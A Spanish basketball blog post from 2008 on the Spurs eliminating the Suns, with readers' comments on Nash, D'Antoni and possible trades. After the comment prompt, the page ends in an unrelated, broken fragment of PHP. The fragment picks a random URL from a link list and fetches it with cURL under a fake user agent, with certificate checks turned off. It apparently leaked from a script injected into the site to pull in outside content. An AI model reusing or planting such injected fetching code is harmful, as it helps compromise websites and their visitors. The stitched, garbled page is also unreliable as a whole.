¿Shaq? Sin problema. Que pase el siguiente…

30 de April de 2008 por TheDeerHunter

Otro año más, los Spurs han calcado el tratamiento frente a los desesperados Suns. Se trata de dos plantillas increíbles. Los dos máximos aspirantes al título del oeste que se cruzan en primera ronda en una final demasiado anticipada. Pero los partidos y las series no sólo se ganan en la cancha, mano a mano entre los jugadores. Se empiezan a ganar cuando unos consiguen inducirle a los otros el pensamiento de que no podrán con ellos, o las dudas sobre su propio estilo de juego, o incluso la idea de que los segundos únicamente podrán batirles si son capaces de parecerse a los primeros. El concepto de lograr influir sobre el comportamiento de los demás es lo que te da la iniciativa, el mando… te hace verdaderamente grande.

Es difícil determinar cuando los Suns perdieron la fe en su propio proyecto. ¿el año pasado? ¿el anterior? ¿cuando Nash se comió la mesa de anotadores? ¿cuando le rompieron la cara?. La sombra de los Spurs es alargada, es inevitable que intimiden y algunos dudaban que Suns lograra ganar nunca a Spurs con aquel estilo de juego. Ya nunca lo sabremos.

Lo que no se ha terminado de entender es precísamente ese cambio súbito de rumbo, a mitad de todo, siendo líderes del oeste y jugando muy bien… de repente nada de eso servía para nada. Se podía intuir el objetivo, la intención pero, ¿la forma? ¿la improvisación? Eso ha sido más difícil. El caso es que ya está demostrado que el intento ha fracasado. Que no se ha mejorado un ápice el resultado y que el precio ha sido, como mínimo, renunciar a todo el proyecto. El precio ha sido claudicar. Y lo peor de todo es que alguna de esas derrotas ha venido precísamente originada por el concepto de ese cambio.

Popovic nos ha vuelto a dar una lección a muchos. Una lección indiscutible, a pesar de que algunos jamás la aprenderemos aunque nos la demuestren mil veces. La tela de araña ha asfixiado por completo los recursos “potenciados” de los Suns… y es que, cuando apuestas todo a una carta te arriesgas a que tu rival la pueda tener más alta. Phoenix apostó fuerte por destrozar el juego interior de Spurs y Popovic nos ha mostrado lo fácil que es neutralizarlo… y es que ha resultado tan fácil que asusta y, da pena.

Al margen de eso, deberíamos admirar todos la grandeza sublime de Duncan. Sin lugar a dudas el mejor Ala-pívot de la historia. Y el trabajo encomiable de sus compañeros (iba a decir escuderos, pero uno piensa que Duncan jamás los llamaría así) Los de lujo como Parker y Ginobili… y los no tan de lujo como Finley, Stoudamire, Oberto, Thomas… Más allá de cualquier especulación son los máximos favoritos al título, mientras no se demuestre lo contrario.

Por último, una mención especial a Steve Nash, que ha sufrido lo indecible en esta eliminatoria y en alguna otra que recordamos. Otro de los grandes que parece se le están escapando los últimos trenes que le lleven al título. Una grandísima lástima.

Comenta

4 comentarios a esta entrada

  1. txusma dice:
    #1

    Venga, vamos a empezar con las suposiciones… Q va a hacer los Suns este verano? D’Antoni esta mas fuera q dentro, pero q pasa con los jugadores? Alguna posibilidad de trade? Amare parece intocable, pero no veo imposible q Nash abandone el barco (Q os pareceria un Nash x Odom a los amarillos?), Diaw y O’Neal no se los cuelas a nadie y el resto tampoco tienen contratos estratosfericos. Entretenidos van a estar en los despachos.

      Citar

  2. Pases Largos - semana 1 | Dribleo dice:
    #2
  3. Dantley dice:
    #3

    Fijaros que a mí lo de los malos tiempos para la lírica me parece más apropiado para los Suns. Con la lírica no ganaron y se les acabó la paciencia. Qué pena.

    Además, hay muy poca capacidad de maniobra con el contratazo de Shaq. Los Suns y los Mavericks han dado una lección de como arruinar el futuro a cambio de un mal presente. Nash x Odom? Vale más Nash aunque ya dé síntomas de cansancio.

    Será interesante también saber si alguien apuesta por D’Antoni. Creo que sigue teniendo mucho que decir.

      Citar

  4. TheDeerHunter dice:
    #4

    Lo de la lírica, visto en líneas generales, puede aplicarse a los dos equipos en cierto sentido, y de paso la comparativa entre ellos es inevitable.
    El matiz viene porque Dallas, en mi opinión, no ha renunciado a su estilo ni en su final. Su error ha sido otro y, la jugada, a priori era más inteligente de no haber sido por la cláusula de Devean George. De haber logrado a Kidd sin dar nada a cambio el equipo hubiera quedado potenciado sí o sí… y el estilo de Dallas en su día demostró que podía funcionar sin tanto poder interior, como se les exige indispensablemente a los equipos del oeste.

    Los Suns, en cambio, en cuanto tuvieron ocasión le dieron carpetazo a ese estilo propio que habían creado y lo hicieron de una forma completamente artificial y forzada. Ya el propio gesto les aleja completamente de esa idea de lirismo de la que estamos hablando.

    Acerca de D’Antoni… yo ya no sé que pensar. Por mi parte me ha decepcionado por su falta de capacidad de maniobra en determinados momentos. Supongo que seguirá el mismo camino que Avery Johnson (a la p. calle) y veo a Toronto un posible destino interesante para él, para el equipo y para los jugadores españoles.

    OdomxNash. No lo verán vuestros ojos mientras tito Phill siga al mando.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>